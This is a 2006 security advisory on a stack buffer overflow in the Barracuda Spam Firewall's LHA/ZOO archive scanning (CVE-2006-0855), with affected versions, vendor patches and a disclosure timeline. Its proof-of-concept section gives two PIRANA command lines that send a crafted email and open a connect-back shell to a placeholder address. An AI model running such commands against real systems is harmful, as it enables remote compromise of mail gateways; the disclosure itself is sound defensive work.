|
|
|
|
| |
Credit:
The information has been provided by Jean-Sebastien Guay-Leroux.
|
| |
Vulnerable Systems:
* Barracuda Spam Firewall with firmware versions prior to 3.3.03.022
* Barracuda Spam Firewall with spamdef version prior to 3.0.10045
When building a special LHA or ZOO archive with long filenames in it, it is possible to overflow a buffer on the stack used by the program and seize control of the program. Since this component is used when scanning an incoming email, remote compromise is possible by sending a simple email with the specially crafted archive attached to the Barracuda Spam Firewall. No administration access (on port 8000) needed for successfull exploitation.
Proof of concept:
Using the PIRANA framework, available at http://www.guay-leroux.com, it is possible to test the Barracuda Spam Firewall against the LHA or ZOO vulnerability.
By calling PIRANA the way it is described below, you will get a TCP connect back shell on IP address 1.2.3.4 and port 1234:
LHA:
perl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1
ZOO:
perl pirana.pl -e 4 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \ -p 1234 -z -c 1 -d 1
Vendor Status:
Barracuda Networks pushed an urgent critical patch in spamdef #3.0.9388, available March 3rd 2006.
They also published an official patch in firmware #3.3.03.022, available April 3rd 2006.
It is recommended to update to firmware #3.3.03.022 .
CVE Information:
CVE-2006-0855
OSVDB References:
#5753, #5754, #23460
Disclosure Timeline:
* 2006-03-02 - Disclosure of vulnerability to Barracuda Networks
* 2006-03-02 - Acknowledgement of the problem
* 2006-03-03 - ZOO Problem fixed
* 2006-03-24 - LHA Problem fixed
* 2006-04-03 - Advisory disclosed to public
|
|
|
|
|
